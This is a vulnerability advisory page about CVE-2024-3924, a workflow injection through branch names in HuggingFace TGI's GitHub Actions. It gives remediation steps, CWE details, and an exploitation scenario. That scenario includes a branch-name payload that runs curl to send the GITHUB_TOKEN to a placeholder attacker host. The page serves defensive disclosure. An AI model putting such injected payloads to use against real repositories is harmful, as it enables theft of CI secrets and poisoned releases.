AI Threat Alert
CVE-2024-3924: text-generation-inference: workflow injection RCE
UNKNOWN CISA: TRACK*A GitHub Actions workflow in HuggingFace TGI uses the PR branch name (`github.head_ref`) unsanitized in a shell command, letting any external contributor execute arbitrary code on the CI runner by naming their branch as a payload. If your team uses TGI or forks of it, verify you're running a version past the fix commit (88702d8) and audit your own workflows for similar `github.head_ref` misuse. The real risk is supply chain: a compromised runner can exfiltrate repo secrets, inject malicious artifacts, or backdoor releases.
What is the risk?
Risk is HIGH for maintainers and contributors of TGI and any downstream forks. Exploitation requires only the ability to open a pull request — no repository write access needed. The affected workflow runs on `pull_request_target` context (implied by the vulnerability pattern), granting the runner access to repository secrets. For end-users who only consume published TGI releases, risk is indirect but real if the CI pipeline was exploited to poison a release artifact before the patch.
How severe is it?
What should I do?
5 steps-
Patch
Ensure TGI >= post-commit 88702d8 (v2.0.0 fix). Verify using
git log --oneline | grep 88702d8in your fork. -
Audit workflows
Grep all
.github/workflows/*.ymlfiles for unquoted${{ github.head_ref }},${{ github.event.pull_request.head.ref }}, or similar user-controlled inputs used inrun:steps. -
Replace with safe alternatives
Use
${{ github.base_ref }}where applicable, or sanitize viaenv:variable assignment before shell use. -
Restrict pull_request_target
Limit secrets access for workflows triggered by external PRs. Use
pull_request(no secret access) instead ofpull_request_targetunless required. -
Verify release integrity
Check SHA/digest of TGI images/packages against official Hugging Face releases to detect any potential tampering during the vulnerability window (before May 2024 fix).
What does CISA's SSVC say?
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2024-3924?
A GitHub Actions workflow in HuggingFace TGI uses the PR branch name (`github.head_ref`) unsanitized in a shell command, letting any external contributor execute arbitrary code on the CI runner by naming their branch as a payload. If your team uses TGI or forks of it, verify you're running a version past the fix commit (88702d8) and audit your own workflows for similar `github.head_ref` misuse. The real risk is supply chain: a compromised runner can exfiltrate repo secrets, inject malicious artifacts, or backdoor releases.
Is CVE-2024-3924 actively exploited?
No confirmed active exploitation of CVE-2024-3924 has been reported, but organizations should still patch proactively.
How to fix CVE-2024-3924?
1. **Patch**: Ensure TGI >= post-commit 88702d8 (v2.0.0 fix). Verify using `git log --oneline | grep 88702d8` in your fork. 2. **Audit workflows**: Grep all `.github/workflows/*.yml` files for unquoted `${{ github.head_ref }}`, `${{ github.event.pull_request.head.ref }}`, or similar user-controlled inputs used in `run:` steps. 3. **Replace with safe alternatives**: Use `${{ github.base_ref }}` where applicable, or sanitize via `env:` variable assignment before shell use. 4. **Restrict pull_request_target**: Limit secrets access for workflows triggered by external PRs. Use `pull_request` (no secret access) instead of `pull_request_target` unless required. 5. **Verify release integrity**: Check SHA/digest of TGI images/packages against official Hugging Face releases to detect any potential tampering during the vulnerability window (before May 2024 fix).
What systems are affected by CVE-2024-3924?
This vulnerability affects the following AI/ML architecture patterns: LLM inference serving, CI/CD pipelines for AI frameworks, Model serving infrastructure, Self-hosted HuggingFace TGI deployments.
What is the CVSS score for CVE-2024-3924?
No CVSS score has been assigned yet.
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0010.001 AI Software AML.T0050 Command and Scripting Interpreter AML.T0055 Unsecured Credentials AML.T0079 Stage Capabilities Compliance Controls Affected
What are the technical details?
Original Advisory
A code injection vulnerability exists in the huggingface/text-generation-inference repository, specifically within the `autodocs.yml` workflow file. The vulnerability arises from the insecure handling of the `github.head_ref` user input, which is used to dynamically construct a command for installing a software package. An attacker can exploit this by forking the repository, creating a branch with a malicious payload as the name, and then opening a pull request to the base repository. Successful exploitation could lead to arbitrary code execution within the context of the GitHub Actions runner. This issue affects versions up to and including v2.0.0 and was fixed in version 2.0.0.
Exploitation Scenario
An adversary targeting an organization's LLM inference infrastructure forks `huggingface/text-generation-inference`. They create a branch named `$(curl -s https://attacker.com/exfil?token=$GITHUB_TOKEN)` or a more complex payload embedding reverse shell code. They open a pull request from this branch to the upstream repo. GitHub Actions triggers the `autodocs.yml` workflow on the PR, which constructs a `pip install` or similar command interpolating the raw branch name — executing the attacker's payload in the runner context. The runner, having access to repository secrets (PyPI tokens, signing keys, HuggingFace Hub credentials), exfiltrates them. The attacker then uses stolen credentials to publish a trojanized TGI release to PyPI or the Docker Hub, which propagates to every organization that auto-updates their LLM serving infrastructure.
Weaknesses (CWE)
CWE-94 — Improper Control of Generation of Code ('Code Injection'): The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.
- [Architecture and Design] Refactor your program so that you do not have to dynamically generate code.
- [Architecture and Design] Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your product. Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.
Source: MITRE CWE corpus.
References
Timeline
Related Vulnerabilities
CVE-2025-59528 10.0 Flowise: Unauthenticated RCE via MCP config injection
Same attack type: Supply Chain CVE-2024-2912 10.0 BentoML: RCE via insecure deserialization (CVSS 10)
Same attack type: Supply Chain CVE-2023-3765 10.0 MLflow: path traversal allows arbitrary file read
Same attack type: Supply Chain CVE-2025-5120 10.0 smolagents: sandbox escape enables unauthenticated RCE
Same attack type: Supply Chain CVE-2026-21858 10.0 n8n: Input Validation flaw enables exploitation
Same attack type: Code Execution